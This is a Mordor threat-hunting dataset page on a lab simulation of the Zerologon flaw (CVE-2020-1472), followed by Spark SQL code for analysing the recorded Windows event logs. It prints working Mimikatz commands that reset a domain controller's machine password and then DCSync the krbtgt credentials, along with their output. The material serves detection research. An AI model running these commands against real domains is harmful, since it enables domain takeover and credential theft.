Mimikatz Netlogon Unauthenticated NetrServerAuthenticate2

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/09/16

Modification Date

2020/09/16

Tactics

[‘TA0008’]

Techniques

[‘T1210’]

Tags

[‘CVE-2020-1472’, ‘Password Update’, ‘Netlogon Insecure AES-CFB8’]

Dataset Description

This dataset represents adversaries leveraging a vulnerability (CVE-2020-1472) in a cryptographic authentication scheme used by the Netlogon Remote Protocol, which among other things can be used to update computer passwords. This vulnerability was discovered by @@SecuraBV.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

ShellCmd

Mordor shire

tool

lsadump

Mordor shire

tool

SharpZeroLogon

Adversary View

Mimikatz Implementation (NetrServerAuthenticate2)
=================================================

(wardog) > ShellCmd /shellcommand:"C:\Users\pgustavo\Downloads\mimikatz_trunk\x64\mimikatz.exe \"lsadump::zerologon /target:MORDORDC.theshire.local /account:MORDORDC$ /exploit\" exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 16 2020 12:02:22
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > http://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/


mimikatz(commandline) # lsadump::zerologon /target:MORDORDC.theshire.local /account:MORDORDC$ /exploit

Target : MORDORDC.theshire.local
Account: MORDORDC$
Type   : 6 (Server)
Mode   : exploit

Trying to 'authenticate'...
====================================================

NetrServerAuthenticate2: 0x00000000
NetrServerPasswordSet2 : 0x00000000

* Authentication: OK -- vulnerable
* Set password  : OK -- may be unstable

mimikatz(commandline) # exit

Bye!

DCSync Follow-up (Optional)
(wardog) > ShellCmd /shellcommand:"C:\Users\pgustavo\Downloads\mimikatz_trunk\x64\mimikatz.exe \"lsadump::dcsync /domain:theshire.local /dc:MORDORDC.theshire.local /user:krbtgt /authuser:MORDORDC$ /authdomain:theshire /authpassword:\\"\\" /authntlm\" exit"

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+------------------------------------+-------+-----+
|Hostname                   |Channel                             |EventID|count|
+---------------------------+------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|7      |102  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|12     |99   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |88   |
|WORKSTATION6.theshire.local|Security                            |4658   |64   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|13     |59   |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |50   |
|WORKSTATION6.theshire.local|Security                            |4656   |32   |
|WORKSTATION6.theshire.local|Security                            |4690   |32   |
|WORKSTATION6.theshire.local|Security                            |4663   |32   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|7      |25   |
|MORDORDC.theshire.local    |Security                            |5156   |21   |
|WORKSTATION5.theshire.local|Security                            |5158   |20   |
|MORDORDC.theshire.local    |Security                            |5158   |16   |
|WORKSTATION5.theshire.local|Security                            |5156   |16   |
|WORKSTATION6.theshire.local|Security                            |5156   |15   |
|WORKSTATION6.theshire.local|Security                            |5158   |15   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|3      |9    |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|12     |7    |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|11     |6    |
|WORKSTATION5.theshire.local|Security                            |4658   |6    |
+---------------------------+------------------------------------+-------+-----+
only showing top 20 rows